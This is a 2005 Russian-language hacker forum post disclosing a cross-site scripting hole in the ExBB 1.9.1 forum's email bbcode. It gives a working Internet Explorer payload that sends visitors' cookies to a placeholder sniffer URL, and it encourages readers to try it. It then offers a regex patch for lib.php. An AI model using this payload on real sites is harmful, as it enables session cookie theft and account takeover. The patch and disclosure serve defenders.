ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу XSS ExBB 1.9.1
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

XSS ExBB 1.9.1
  #1  
Старый 14.04.2005, 01:47
Kihamo
Новичок
Регистрация: 14.01.2005
Сообщений: 4
Провел на форуме:
5921

Репутация: 0
По умолчанию XSS ExBB 1.9.1
Ахтунг!
Недавно в инете появилась инфа о xss в bbcode url, разрабочтик исправил ошибку, но как оказалось не везде =)
И так поехали. Сразу предупрежу, что данная бага работает только в Internet Explorer . Суть состоит в том, что одна из форм записи bbcode email пропускает нужные нам символы, что позволяет выйти за пределы тега. Вот пример XSS
Код:
[ email]'style='display:none;background:url(javascript:document.images[2].src="http://you_sniffer_url/sniffer.php?"+document.cookie)[/email]
Думаю, что где и как все это работает объяснять не надо. Так что дерзайте =)
А теперь инфа добропорядочным юзерам. Раз разработчик думать не хочет, бум думать за него =)
Открываем файл lib.php и в примерно в 588 строке находим такой код
Код:
$post = preg_replace( "#\[email\](\S+?)\[/email\]#i", "<a href='mailto:\\1'>\\1</a>", $post );
и заменяем его на
Код:
$post = preg_replace( "#\[email\]([a-z0-9&\-_.]+?@[\w\-]+\.([\w\-\.]+\.)?[\w]+)\[/email\]#i", "<a href='mailto:\\1'>\\1</a>", $post );
За сим усе.
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ